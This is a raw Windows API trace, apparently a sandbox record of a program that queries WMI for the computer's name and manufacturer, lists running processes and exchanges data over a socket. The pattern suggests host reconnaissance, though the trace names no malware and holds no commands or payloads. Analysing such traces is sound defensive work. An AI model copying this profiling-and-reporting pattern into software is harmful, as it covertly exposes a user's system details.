	[0263.307] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4c8 | out: ppv=0x5fae4c8*=0x6095178) returned 0x0
	[0263.307] WbemDefPath:IUnknown:QueryInterface (in: This=0x6095178, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae2f8 | out: ppvObject=0x5fae2f8*=0x0) returned 0x80004002
	[0263.307] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6095178, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae330 | out: ppvObject=0x5fae330*=0x608e7e0) returned 0x0
	[0263.308] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0d4 | out: ppvObject=0x5fae0d4*=0x608e7e0) returned 0x0
	[0263.308] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae090 | out: ppvObject=0x5fae090*=0x0) returned 0x80004002
	[0263.308] WbemDefPath:IUnknown:AddRef (This=0x608e7e0) returned 0x3
	[0263.308] CoGetContextToken (in: pToken=0x5fadf1c | out: pToken=0x5fadf1c) returned 0x0
	[0263.308] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf04 | out: ppvObject=0x5fadf04*=0x61c7c00) returned 0x0
	[0263.308] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x61c7c00, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf0c | out: pCid=0x5fadf0c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0263.309] WbemDefPath:IUnknown:Release (This=0x61c7c00) returned 0x3
	[0263.309] CoGetContextToken (in: pToken=0x5fadf14 | out: pToken=0x5fadf14) returned 0x0
	[0263.309] WbemDefPath:IUnknown:AddRef (This=0x608e7e0) returned 0x4
	[0263.309] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf88 | out: ppvObject=0x5fadf88*=0x0) returned 0x80004002
	[0263.309] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x3
	[0263.309] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x2
	[0263.309] WbemDefPath:IUnknown:Release (This=0x6095178) returned 0x0
	[0263.309] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x1
	[0263.310] CoGetContextToken (in: pToken=0x5fae7c4 | out: pToken=0x5fae7c4) returned 0x0
	[0263.310] CoGetContextToken (in: pToken=0x5fae784 | out: pToken=0x5fae784) returned 0x0
	[0263.310] WbemDefPath:IUnknown:AddRef (This=0x608e7e0) returned 0x2
	[0263.310] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x5fae800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae7fc | out: ppvObject=0x5fae7fc*=0x608e7e0) returned 0x0
	[0263.310] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x2
	[0263.310] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x1
	[0263.310] CoGetContextToken (in: pToken=0x5fae844 | out: pToken=0x5fae844) returned 0x0
	[0263.310] CoGetContextToken (in: pToken=0x5fae804 | out: pToken=0x5fae804) returned 0x0
	[0263.310] WbemDefPath:IUnknown:AddRef (This=0x608e7e0) returned 0x2
	[0263.310] WbemDefPath:IUnknown:QueryInterface (in: This=0x608e7e0, riid=0x5fae880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae87c | out: ppvObject=0x5fae87c*=0x608e7e0) returned 0x0
	[0263.310] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x2
	[0263.311] WbemDefPath:IUnknown:AddRef (This=0x608e7e0) returned 0x3
	[0263.311] WbemDefPath:IWbemPath:SetText (This=0x608e7e0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0263.311] WbemDefPath:IUnknown:Release (This=0x608e7e0) returned 0x2
	[0263.311] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5fae9e4 | out: puCount=0x5fae9e4*=0x2) returned 0x0
	[0263.311] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9e0*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9e0*=0x17, pszText=0x0) returned 0x0
	[0263.311] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5fae9e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.311] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0263.311] IUnknown:AddRef (This=0x609513c) returned 0x3
	[0263.311] IEnumWbemClassObject:Next (in: This=0x609513c, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x300cec4 | out: apObjects=0x4f1530*=0x0, puReturned=0x300cec4*=0x0) returned 0x1
	[0263.318] IUnknown:Release (This=0x609513c) returned 0x2
	[0263.318] CoGetContextToken (in: pToken=0x5fae8b4 | out: pToken=0x5fae8b4) returned 0x0
	[0263.318] WbemLocator:IUnknown:Release (This=0x5874bc) returned 0x1
	[0263.318] IUnknown:Release (This=0x609513c) returned 0x0
	[0263.321] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0263.321] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0263.321] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.321] IWbemClassObject:Get (in: This=0x608e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300dcec*=0, plFlavor=0x300dcf0*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x300dcec*=8, plFlavor=0x300dcf0*=64) returned 0x0
	[0263.322] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.322] IWbemClassObject:Get (in: This=0x608e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300dcec*=8, plFlavor=0x300dcf0*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x300dcec*=8, plFlavor=0x300dcf0*=64) returned 0x0
	[0263.322] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.322] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0263.322] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0263.322] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.322] IWbemClassObject:Get (in: This=0x608e398, wszName="__CLASS", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300dda4*=0, plFlavor=0x300dda8*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x300dda4*=8, plFlavor=0x300dda8*=64) returned 0x0
	[0263.322] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.322] IWbemClassObject:Get (in: This=0x608e398, wszName="__CLASS", lFlags=0, pVal=0x5faea18*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300dda4*=8, plFlavor=0x300dda8*=64 | out: pVal=0x5faea18*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x300dda4*=8, plFlavor=0x300dda8*=64) returned 0x0
	[0263.322] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.323] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0263.323] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0263.323] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.323] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea48 | out: puCount=0x5faea48*=0x2) returned 0x0
	[0263.323] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea44*=0x0, pszText=0x0 | out: puBuffLength=0x5faea44*=0x17, pszText=0x0) returned 0x0
	[0263.323] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea44*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea44*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.323] IWbemClassObject:GetNames (in: This=0x608e398, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x5faea0c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x5fae9d8 | out: pNames=0x5fae9d8*="\x01ƀ\x04") returned 0x0
	[0263.323] SafeArrayGetDim (psa=0x5863f8) returned 0x1
	[0263.323] SafeArrayGetDim (psa=0x5863f8) returned 0x1
	[0263.323] SafeArrayGetLBound (in: psa=0x5863f8, nDim=0x1, plLbound=0x5fae5d4 | out: plLbound=0x5fae5d4) returned 0x0
	[0263.324] IWbemClassObject:Get (in: This=0x608e398, wszName="__GENUS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e7e0*=0, plFlavor=0x300e7e4*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x300e7e0*=3, plFlavor=0x300e7e4*=64) returned 0x0
	[0263.324] IWbemClassObject:Get (in: This=0x608e398, wszName="__CLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e814*=0, plFlavor=0x300e818*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x300e814*=8, plFlavor=0x300e818*=64) returned 0x0
	[0263.324] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.324] IWbemClassObject:Get (in: This=0x608e398, wszName="__SUPERCLASS", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e878*=0, plFlavor=0x300e87c*=0 | out: pVal=0x5faea04*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e878*=8, plFlavor=0x300e87c*=64) returned 0x0
	[0263.324] IWbemClassObject:Get (in: This=0x608e398, wszName="__DYNASTY", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e8a0*=0, plFlavor=0x300e8a4*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x300e8a0*=8, plFlavor=0x300e8a4*=64) returned 0x0
	[0263.324] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0263.325] IWbemClassObject:Get (in: This=0x608e398, wszName="__RELPATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e904*=0, plFlavor=0x300e908*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x300e904*=8, plFlavor=0x300e908*=64) returned 0x0
	[0263.325] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0263.325] IWbemClassObject:Get (in: This=0x608e398, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e988*=0, plFlavor=0x300e98c*=0 | out: pVal=0x5faea04*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x300e988*=3, plFlavor=0x300e98c*=64) returned 0x0
	[0263.325] IWbemClassObject:Get (in: This=0x608e398, wszName="__DERIVATION", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e9bc*=0, plFlavor=0x300e9c0*=0 | out: pVal=0x5faea04*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5863f8*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x61c7c40, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x300e9bc*=8200, plFlavor=0x300e9c0*=64) returned 0x0
	[0263.326] IWbemClassObject:Get (in: This=0x608e398, wszName="__SERVER", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300e9f4*=0, plFlavor=0x300e9f8*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x300e9f4*=8, plFlavor=0x300e9f8*=64) returned 0x0
	[0263.326] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0263.326] IWbemClassObject:Get (in: This=0x608e398, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300ea40*=0, plFlavor=0x300ea44*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x300ea40*=8, plFlavor=0x300ea44*=64) returned 0x0
	[0263.326] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0263.326] IWbemClassObject:Get (in: This=0x608e398, wszName="__PATH", lFlags=0, pVal=0x5faea04*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300ea90*=0, plFlavor=0x300ea94*=0 | out: pVal=0x5faea04*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x300ea90*=8, plFlavor=0x300ea94*=64) returned 0x0
	[0263.326] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0263.326] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6092088, puCount=0x5faea84 | out: puCount=0x5faea84*=0x2) returned 0x0
	[0263.326] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea80*=0x0, pszText=0x0 | out: puBuffLength=0x5faea80*=0x17, pszText=0x0) returned 0x0
	[0263.326] WbemDefPath:IWbemPath:GetText (in: This=0x6092088, lFlags=4, puBuffLength=0x5faea80*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea80*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0263.327] IWbemClassObject:Get (in: This=0x608e398, wszName="Manufacturer", lFlags=0, pVal=0x5faea40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300eb94*=0, plFlavor=0x300eb98*=0 | out: pVal=0x5faea40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x300eb94*=8, plFlavor=0x300eb98*=32) returned 0x0
	[0263.327] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.327] IWbemClassObject:Get (in: This=0x608e398, wszName="Manufacturer", lFlags=0, pVal=0x5faeaf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x300eb94*=8, plFlavor=0x300eb98*=32 | out: pVal=0x5faeaf8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CLEVO", varVal2=0x0), pType=0x300eb94*=8, plFlavor=0x300eb98*=32) returned 0x0
	[0263.327] SysStringLen (param_1="CLEVO") returned 0x5
	[0263.327] send (s=0x424, buf=0x300f5b4*, len=32, flags=0) returned 32
	[0263.329] GetLastError () returned 0x0
	[0263.329] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 90
	[0264.190] GetLastError () returned 0x0
	[0264.192] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0264.413] send (s=0x424, buf=0x3027bd4*, len=27, flags=0) returned 27
	[0264.414] GetLastError () returned 0x0
	[0264.414] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 122
	[0265.193] GetLastError () returned 0x0
	[0265.194] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0265.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4f1518, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0265.296] GetLastError () returned 0xcb
	[0265.486] EnumProcesses (in: lpidProcess=0x30443fc, cb=0x400, lpcbNeeded=0x5fae948 | out: lpidProcess=0x30443fc, lpcbNeeded=0x5fae948) returned 1
	[0265.490] GetLastError () returned 0x0
	[0265.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39782b8, Length=0x20000, ResultLength=0x5fae8c8 | out: SystemInformation=0x39782b8, ResultLength=0x5fae8c8*=0xeac8) returned 0x0
	[0265.957] send (s=0x424, buf=0x30a3ffc*, len=22, flags=0) returned 22
	[0265.957] GetLastError () returned 0x0
	[0265.958] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 77
	[0266.204] GetLastError () returned 0x0
	[0266.205] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0266.302] send (s=0x424, buf=0x30b17ec*, len=25, flags=0) returned 25
	[0266.302] GetLastError () returned 0x0
	[0266.303] recv (in: s=0x424, buf=0x2fac898, len=502, flags=0 | out: buf=0x2fac898*) returned 122
	[0267.189] GetLastError () returned 0x0
	[0267.191] VirtualQuery (in: lpAddress=0x5fade58, lpBuffer=0x5faee58, dwLength=0x1c | out: lpBuffer=0x5faee58*(BaseAddress=0x5fad000, AllocationBase=0x5620000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0267.192] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9cc | out: ppv=0x5fae9cc*=0x4a8dec) returned 0x0
	[0267.193] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9c4 | out: pAptType=0x5fae9c4*=1) returned 0x0
	[0267.193] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9c8 | out: ppvObject=0x5fae9c8*=0x0) returned 0x80004002
	[0267.193] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0267.193] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4e4 | out: ppv=0x5fae4e4*=0x608dee8) returned 0x0
	[0267.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae314 | out: ppvObject=0x5fae314*=0x0) returned 0x80004002
	[0267.194] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae34c | out: ppvObject=0x5fae34c*=0x60950b0) returned 0x0
	[0267.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0f0 | out: ppvObject=0x5fae0f0*=0x60950b0) returned 0x0
	[0267.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae0ac | out: ppvObject=0x5fae0ac*=0x0) returned 0x80004002
	[0267.195] WbemDefPath:IUnknown:AddRef (This=0x60950b0) returned 0x3
	[0267.195] CoGetContextToken (in: pToken=0x5fadf38 | out: pToken=0x5fadf38) returned 0x0
	[0267.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf20 | out: ppvObject=0x5fadf20*=0x61ca608) returned 0x0
	[0267.195] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x61ca608, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf28 | out: pCid=0x5fadf28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0267.195] WbemDefPath:IUnknown:Release (This=0x61ca608) returned 0x3
	[0267.195] CoGetContextToken (in: pToken=0x5fadf30 | out: pToken=0x5fadf30) returned 0x0
	[0267.195] WbemDefPath:IUnknown:AddRef (This=0x60950b0) returned 0x4
	[0267.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfa4 | out: ppvObject=0x5fadfa4*=0x0) returned 0x80004002
	[0267.196] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x3
	[0267.196] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x2
	[0267.196] WbemDefPath:IUnknown:Release (This=0x608dee8) returned 0x0
	[0267.196] WbemDefPath:IUnknown:Release (This=0x60950b0) returned 0x1
	[0267.196] CoGetContextToken (in: pToken=0x5fae7e0 | out: pToken=0x5fae7e0) returned 0x0
	[0267.196] CoGetContextToken (in: pToken=0x5fae7a0 | out: pToken=0x5fae7a0) returned 0x0
	[0267.196] WbemDefPath:IUnknown:AddRef (This=0x60950b0) returned 0x2
	[0267.196] WbemDefPath:IUnknown:QueryInterface (in: This=0x60950b0, riid=0x5fae81c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae818 | out: ppvObject=0x5fae818*=0x60950b0) returned 0x0
